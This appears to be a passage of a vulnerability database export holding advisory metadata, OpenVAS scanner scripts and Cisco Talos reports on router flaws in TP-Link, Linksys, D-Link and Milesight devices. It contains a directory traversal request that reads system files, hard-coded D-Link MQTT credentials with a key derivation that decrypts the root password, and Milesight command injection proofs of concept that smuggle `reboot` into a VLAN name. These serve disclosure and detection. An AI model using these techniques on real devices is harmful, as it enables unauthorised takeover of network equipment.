\n * Refer to [Avoiding Social Engineering and Phishing Attacks](<https://www.us-cert.gov/ncas/tips/ST04-014>) for more information on social engineering attacks.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-23T12:00:00", "type": "ics", "title": "Sierra Wireless AirLink ALEOS (Update B)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4061", "CVE-2018-4062", "CVE-2018-4063", "CVE-2018-4065", "CVE-2018-4066", "CVE-2018-4067", "CVE-2018-4069"], "modified": "2020-04-23T12:00:00", "id": "ICSA-19-122-03", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-19-122-03", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T21:34:11", "description": "TP-Link Wi-Fi routers are prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-11-20T00:00:00", "type": "openvas", "title": "TP-Link Wi-Fi Routers Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3951", "CVE-2018-3950", "CVE-2018-3948", "CVE-2018-3949"], "modified": "2020-06-26T00:00:00", "id": 
"OPENVAS:1361412562310141702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141702", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# TP-Link TL-R600VPN Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141702\");\n script_version(\"2020-06-26T10:20:53+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-26 10:20:53 +0000 (Fri, 26 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-20 08:40:10 +0700 (Tue, 20 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-3948\", \"CVE-2018-3949\", \"CVE-2018-3950\", \"CVE-2018-3951\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"TP-Link Wi-Fi Routers Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright 
(C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"Router_Webserver/banner\");\n\n script_tag(name:\"summary\", value:\"TP-Link Wi-Fi routers are prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"insight\", value:\"TP-Link Wi-Fi routers are prone to multiple vulnerabilities:\n\n - HTTP denial of service (CVE-2018-3948)\n\n - HTTP server information disclosure (CVE-2018-3949)\n\n - HTTP server ping address remote code execution (CVE-2018-3950)\n\n - HTTP server fs directory remote code execution (CVE-2018-3951)\");\n\n script_tag(name:\"affected\", value:\"TP-Link TL-R600VPN HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3.\n\n At least TL-WA890EA with the most recent firmware version is known to be affected. Other devices\n and firmware versions might be affected as well.\");\n\n script_tag(name:\"solution\", value:\"Update to the latest firmware version.\");\n\n script_xref(name:\"URL\", value:\"https://blog.talosintelligence.com/2018/11/tplinkr600.html\");\n script_xref(name:\"URL\", value:\"https://www.tp-link.com/us/products/details/cat-4909_TL-R600VPN.html\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port(default: 80);\n\nbanner = http_get_remote_headers(port: port);\n\nif (banner && (\"Server: Router Webserver\" >< banner || banner =~ 'Basic realm=\"TP-LINK')) {\n\n files = traversal_files(\"linux\");\n\n headers = make_array(\"Referer\", http_report_vuln_url(port: port, url: \"/Index.htm\", url_only: TRUE));\n\n foreach pattern (keys(files)) {\n file = files[pattern];\n\n url = \"/help/../../../../../../../../../../../../../../../../\" + file;\n\n req = http_get_req(port: port, url: url, add_headers: headers);\n res = 
http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\n if (egrep(pattern: pattern, string: res, icase: FALSE)) {\n report = 'It was possible to obtain /' + file + ' with a directory traversal attack: ' + http_report_vuln_url(port: port, url: url, url_only: TRUE) + '\\n\\nResult:\\n' + res;\n security_message(port: port, data: report);\n exit(0);\n }\n }\n\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:52", "description": "Linksys ESeries are prone to multiple authenticated OS command execution\nvulnerabilities.", "cvss3": {}, "published": "2018-10-30T00:00:00", "type": "openvas", "title": "Linksys ESeries Multiple OS Command Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3953", "CVE-2018-3954", "CVE-2018-3955"], "modified": "2019-01-28T00:00:00", "id": "OPENVAS:1361412562310141621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141621", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_linksys_eseries_cmd_exec_vuln.nasl 13316 2019-01-28 07:41:51Z asteins $\n#\n# Linksys ESeries Multiple OS Command Injection Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:linksys:devices\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141621\");\n script_version(\"$Revision: 13316 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-01-28 08:41:51 +0100 (Mon, 28 Jan 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-30 14:57:10 +0700 (Tue, 30 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-3953\", \"CVE-2018-3954\", \"CVE-2018-3955\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Linksys ESeries Multiple OS Command Injection Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_linksys_devices_detect.nasl\");\n script_mandatory_keys(\"Linksys/model\", \"Linksys/firmware\");\n\n script_tag(name:\"summary\", value:\"Linksys ESeries are prone to multiple authenticated OS command execution\nvulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Specially crafted entries to network configuration information can cause\nexecution of arbitrary system commands, resulting in full control of the device. 
An attacker can send an\nauthenticated HTTP request to trigger this vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Linksys E1200 and E2500.\");\n\n script_tag(name:\"solution\", value:\"Update to firmware version 2.0.10 (E1200), 3.0.05 (E2500) or later.\");\n\n script_xref(name:\"URL\", value:\"https://blog.talosintelligence.com/2018/10/vulnerability-spotlight-linksys-eseries.html\");\n script_xref(name:\"URL\", value:\"https://talosintelligence.com/vulnerability_reports/TALOS-2018-0625\");\n script_xref(name:\"URL\", value:\"https://www.linksys.com/us/support-product?pid=01t80000003KRTzAAO\");\n script_xref(name:\"URL\", value:\"https://www.linksys.com/us/support-product?pid=01t80000003KZuNAAW\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!get_app_location(cpe:CPE, nofork:TRUE))\n exit(0);\n\nmodel = get_kb_item(\"Linksys/model\");\nif (!model || (model !~ \"^E(12|25)00\"))\n exit(0);\n\nif (!version = get_kb_item(\"Linksys/firmware\"))\n exit(0);\n\ncheck_vers = str_replace(string: version, find: \" build \", replace: \".\");\n\nif (model == \"E1200\") {\n if (version_is_less(version: check_vers, test_version: \"2.0.10.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.0.10 build 1\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\nelse if (model == \"E2500\") {\n if (version_is_less(version: check_vers, test_version: \"3.0.05.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.0.05 build 2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "talos": [{"lastseen": "2023-12-02T16:53:04", "description": "### Summary\n\nAn information disclosure vulnerability exists in the WiFi Smart Mesh functionality of D-LINK DIR-3040 
1.13B03. A specially-crafted network request can lead to command execution. An attacker can connect to the MQTT service to trigger this vulnerability.\n\n### Tested Versions\n\nD-LINK DIR-3040 1.13B03\n\n### Product URLs\n\n<https://us.dlink.com/en/products/dir-3040-smart-ac3000-high-power-wi-fi-tri-band-gigabit-router>\n\n### CVSSv3 Score\n\n10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-798 - Use of Hard-coded Credentials\n\n### Details\n\nThe DIR-3040 is an AC3000-based wireless internet router.\n\nAn MQTT service exists on the device to provide communications for D-LINK\u2019s Wifi Mesh capabilities. This service is enabled by default and accepts any subscriber on the network as long as they provide valid credentials. However, these credentials are hard-coded and can be obtained from one of the device\u2019s shared libraries.\n \n \n From /lib/libapson_mqtt_api.so:\n .rodata:0000291C\t00000006\tC\tapson // Username\n .rodata:00002924\t00000006\tC\twrsdd // Password\n \n\nThe MQTT payload data contains specific information needed by secondary routers and extenders to configure the mesh network. In particular, the root password of the primary device is propagated amongst this data to these secondary nodes. 
Typical traffic looks like the following:\n \n \n TOPIC: master\n PAYLOAD:\n 00000000: 00 00 00 07 00 01 34 0A 33 8F 69 05 00 00 01 00 ......4.3.i.....\n 00000010: 00 00 03 11 A3 30 41 8D A1 3C 1A F2 C1 73 2B 27 .....0A..<...s+'\n 00000020: 5B 5A 16 C4 3C 8E F6 68 C2 D6 B2 A8 39 EF AF E3 [Z..<..h....9...\n 00000030: CF F9 BD 7E E0 0D 2E 4E 3D CF 2C 14 10 6C 9C 6C ...~...N=.,..l.l\n 00000040: 71 48 47 6C 23 F2 F0 E5 CD 50 F9 84 1F F3 3C 49 qHGl#....P....<I\n <snipped for brevity>\n 000002C0: 0B D9 26 37 E9 42 DE A8 2C 65 4B A9 7C B2 FE EF ..&7.B..,eK.|...\n 000002D0: B5 E3 CF 81 C2 E4 8A 05 F4 BF AC 46 9D 4D 5B 40 ...........F.M[@\n 000002E0: 19 B1 F1 32 DD 2E 04 B8 6B 9A 54 4E FB 52 69 7D ...2....k.TN.Ri}\n 000002F0: 6C 0F 4D 99 80 26 2F 83 5C 68 69 F7 A1 C8 02 07 l.M..&/.\\hi.....\n 00000300: 75 E8 FA A6 8C 54 02 42 B4 C8 C4 69 CC DD 3A 2D u....T.B...i..:-\n 00000310: 70 5C 3E 52 2E F2 45 8B 66 F2 F0 5F 61 B0 D6 DC p\\>R..E.f.._a...\n 00000320: 5F 61 44 50 25 A7 61 4E 2C 54 D5 44 65 62 2E 8C _aDP%.aN,T.Deb..\n 00000330: D2 E6 DE EF ....\n \n\nThe payload data is serialized as Protocol Buffer data. While the plaintext Protocol Buffer schema is not available, it is not required to deserialize useful information from many of the published MQTT payloads. However, the more sensitive payloads (such as the one above that contains the root password on the device) are encrypted via AES (with a NULL initialization vector).\n\nThe information needed to generate a valid key for decrypting the payload resides within the payload itself. In each encrypted payload, the publisher\u2019s MAC address is listed at offsets 0x6->0xB. 
As we can see in the `/usr/bin/apsond` binary on the target, the key is generated by using the MAC address in a `snprintf()` call using the following format string:\n \n \n 0040a5fc snprintf(&$key, 0x10, \"%02xw%02Xr%02xs%02Xd%02Xd%02x\", zx.d(*(mqtt_payload + 7)), zx.d(*(mqtt_payload + 9)), zx.d(*(mqtt_payload + 0xb)), zx.d(*(mqtt_payload + 6)), zx.d(*(mqtt_payload + 8)), zx.d(*(mqtt_payload + 0xa)))\n \n\nThe characters \u2018wrsdd\u2019 are also inserted between each byte. (Note that the 5th byte of the MAC address is omitted due to the null terminator). Which is essentially:\n \n \n key = (\"%sw%sr%ss%sd%sd\\x00\" % (macBytes[1], macBytes[3].upper(), macBytes[5], macBytes[0].upper(), macBytes[2].upper())).encode('utf-8')\n \n\nUsing the information above, we can see the MAC address is `34:0A:33:8F:69:05`. This can be used to generate the following key for this particular payload:\n \n \n Key:\n 00000000: 30 61 77 38 46 72 30 35 73 33 34 64 33 33 64 00 0aw8Fr05s34d33d.\n \n\nOnce we have the key, we can decrypt the traffic above:\n \n \n Decrypted:\n 00000000: 08 9C 9C B8 75 12 0F 2F 74 6D 70 2F 73 62 64 5F ....u../tmp/sbd_\n 00000010: 63 6F 6E 66 69 67 1A 27 08 FD C1 EF 86 FA FF FF config.'........\n 00000020: FF FF 01 12 03 62 72 30 1A 0B 6D 65 73 68 5F 39 .....br0..mesh_9\n 00000030: 33 38 31 42 35 22 08 44 41 50 2D 31 38 32 30 22 381B5\".DAP-1820\"\n 00000040: D4 02 08 DD F5 B4 D1 05 10 04 1A 4F 08 A8 A5 BE ...........O....\n <snipped for brevity>\n 000002C0: 2A 0E 6E 74 70 31 2E 64 6C 69 6E 6B 2E 63 6F 6D *.ntp1.dlink.com\n 000002D0: 6A 3F 08 B4 E5 D3 CC 06 1A 08 50 61 73 73 77 30 j?........Passw0\n 000002E0: 72 64 22 19 68 74 74 70 3A 2F 2F 64 6C 69 6E 6B rd\".http://dlink\n 000002F0: 72 6F 75 74 65 72 2E 6C 6F 63 61 6C 2F 30 01 3A router.local/0.:\n 00000300: 10 41 6D 65 72 69 63 61 2F 4E 65 77 5F 59 6F 72 .America/New_Yor\n 00000310: 6B k\n \n\nThough unecessary for this attack, we could even go a step further and decode the protocol buffer data:\n \n \n 
13 <chunk> = message:\n 1 <varint> = 1771369140\n 3 <chunk> = \"Passw0rd\" // Here is our root password\n 4 <chunk> = \"http://dlinkrouter.local/\"\n 6 <varint> = 1\n 7 <chunk> = \"America/New_York\"\n \n\nAn attacker could then use this information to login to the web-based administrator console or append `@twsz2018` to the password as in the following example:\n \n \n Passw0rd@twsz2018\n \n\nto login to the telnet/libcli service on the DIR-3040 (as seen in TALOS-2021-1284/CVE-2021-21819) or other devices on the mesh network (such as the DAP-1820 which will give you a root shell once the telnet service is started in the same manner as described in TALOS-2021-1285/CVE-2021-21820).\n\nAn attacker can also take advantage of other useful functions within the mesh network by simply publishing the appropriate payloads to the correct topic. These functions provide many remote capabilities such as rebooting any device on the mesh network and/or kicking out devices within the mesh completely.\n\n### Timeline\n\n2021-08-24 - Vendor Disclosure \n2021-09-23 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "talos", "title": "D-LINK DIR-3040 WiFi Smart Mesh information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21819", "CVE-2021-21820", "CVE-2021-21913"], "modified": "2021-09-23T00:00:00", "id": "TALOS-2021-1361", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1361", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-11-08T19:04:35", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1723\n\n## Milesight UR32L zebra vlan_name OS command injection vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-25582,CVE-2023-25583\n\n##### SUMMARY\n\nTwo OS command injection vulnerabilities exist in the zebra vlan_name functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. 
This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities. The number of functionalities depends on the user privileges. Indeed, the admin user can access the `enable` command, which will allow access to a highly privileged command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nIssuing the `configure terminal` command permits access to the `vlan <VLAN ID>` command that allows configuration of a vlan. 
Several configurations are available for the vlan, one of which is the command `name <vlan name>`, used to add a name to the vlan and set up a network interface accordingly.\n\nAn example of using this functionality is the following one:\n \n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# vlan 1000\n ROUTER(config-switch)# name new\n \n\nThis will add the network interface named `new` and assign to it the vlan id 1000. The function responsible for managing the `name <vlan name>` command is the `zebra`\u2019s `vlan_name` function. This function is vulnerable to two OS command injections through the `<vlan name>` field. Following are the details for the two vulnerabilities.\n\n#### CVE-2023-25582 - replace vlan name\n\nFollowing is the relevant portion of the `vlan_name` function that manages an already-existing vlan configuration:\n \n \n void vlan_name(undefined4 param_1,int vty,undefined4 argc,char **argv)\n \n {\n [... variable declaration ...]\n \n [...]\n config_switch_info = vty->config_switch_info;\n does_interfafce_exist = (switch_node *)check_ifname_exist(*argv);\n if (does_interfafce_exist == (switch_node *)0x0) {\n pthread_mutex_lock((pthread_mutex_t *)switch_if_lock);\n for (switch_node_iterator = switch_if; switch_node_iterator != (switch_node *)0x0;\n switch_node_iterator = switch_node_iterator->next) { [1]\n if (switch_node_iterator->vlan_id == config_switch_info->current_vlan) { [2]\n interface_name = switch_node_iterator->interface_name;\n if (interface_name != (char *)0x0) {\n [... delete old interface ...]\n }\n new_interface_name = zstrdup(1,*argv);\n switch_node_iterator->interface_name = new_interface_name;\n [...]\n snprintf(shell_command,100,\"ip link add link %s name %s type vlan id %d\",\"eth0\",\n new_interface_name,switch_node_iterator->vlan_id); [3]\n system(shell_command); [4]\n [...]\n }\n }\n }\n [...]\n }\n [...]\n }\n \n\nThe `vlan_name` function iterates at `[1]` through all the registered vlan configurations. 
If, at `[2]`, the selected vlan id matches one of the already registered vlan configurations, the code at `[3]` will eventually be reached. At `[3]` the `\"ip link add link eth0 name <provided interface name> type vlan id <provided vlan id>\"` string is composed and then executed through the `system` function at `[4]`. Because no check on the provided interface name is performed, this `vlan_name`\u2019s branch is vulnerable to an OS command injection vulnerability.\n\n#### Exploit Proof of Concept\n\nFollowing is a POC triggering a reboot of the system through the command injection exposed above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# vlan 1000\n ROUTER(config-switch)# name new\n ROUTER(config-switch)# name old`reboot`\n ROUTER(config-switch)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` message is the consequence of the device rebooting.\n\n#### CVE-2023-25583 - new vlan name\n\nFollowing is the relevant portion of the `vlan_name` function that manages a new vlan configuration:\n \n \n void vlan_name(undefined4 param_1,int vty,undefined4 argc,char **argv)\n \n {\n [... 
variable declaration ...]\n \n [...]\n config_switch_info = vty->config_switch_info;\n does_interfafce_exist = (switch_node *)check_ifname_exist(*argv);\n if (does_interfafce_exist == (switch_node *)0x0) {\n pthread_mutex_lock((pthread_mutex_t *)switch_if_lock);\n for (switch_node_iterator = switch_if; switch_node_iterator != (switch_node *)0x0;\n switch_node_iterator = switch_node_iterator->next) { [5]\n [...]\n }\n [...]\n if (switch_node_iterator == (switch_node *)0x0) {\n new_switch = (switch_node *)zcalloc(1,0xc);\n if (new_switch == (switch_node *)0x0) {\n [...]\n }\n else {\n interface_name = *argv;\n new_switch->vlan_id = config_switch_info->current_vlan;\n interface_name_copy = zstrdup(1,interface_name);\n new_switch->interface_name = interface_name_copy;\n if (interface_name_copy != 0) {\n [...]\n snprintf(shell_command,100,\"ip link del %s\",new_switch->interface_name); [6]\n system(shell_command); [7]\n [...]\n }\n [...]\n }\n [...]\n }\n }\n [...]\n }\n \n\nThe `vlan_name` function iterates at `[5]` through all the registered vlan configurations. If the selected vlan id is not in the in the list, the code at `[6]` will eventually be executed. At `[6]` the `\"ip link del <provided interface name>\"` string is composed and then executed at `[7]` through the `system` function. 
Because no check on the provided interface name is performed, this `vlan_name`\u2019s branch is vulnerable to an OS command injection vulnerability.\n\n#### Exploit Proof of Concept\n\nFollowing is a POC triggering a reboot of the system through the command injection exposed above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# vlan 100\n ROUTER(config-switch)# name new`reboot`\n ROUTER(config-switch)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` message is the consequence of the device rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1702\n\nPrevious Report\n\nTALOS-2023-1715\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L zebra vlan_name OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-25582", "CVE-2023-25583"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1723", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1723", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:36", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1706\n\n## Milesight UR32L vtysh_ubus toolsh_excute.constprop.1 OS command injection 
vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-24519,CVE-2023-24520\n\n##### SUMMARY\n\nTwo OS command injection vulnerabilities exist in the vtysh_ubus toolsh_excute.constprop.1 functionality of Milesight UR32L v32.3.0.5. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe Milesight router offers several functionalities through the `/cgi` endpoint. The \u201ccore\u201d functionality we are considering is called `yruo_tools`; in this \u201ccore\u201d there are two functions: \u201cping\u201d and \u201ctraceroute\u201d. For instance, the payload for the `/cgi` API to use the \u201ctraceroute\u201d functionality would look like this:\n \n \n {\n \"id\": 60,\n \"execute\": 1,\n \"core\": \"yruo_tools\",\n \"function\": \"traceroute\",\n \"values\": [\n {\n \"host\": \"<some_host>\"\n }\n ]\n }\n \n\nThe ping payload differs only in the `\"function\"` value, which would be \"ping\".\n\nBoth \u201cping\u201d and \u201ctraceroute\u201d will end up calling the `vtysh_ubus`\u2019s `toolsh_excute.constprop.1` function.\n \n \n void toolsh_excute.constprop.1(void *ping_or_trace,undefined4 params,void 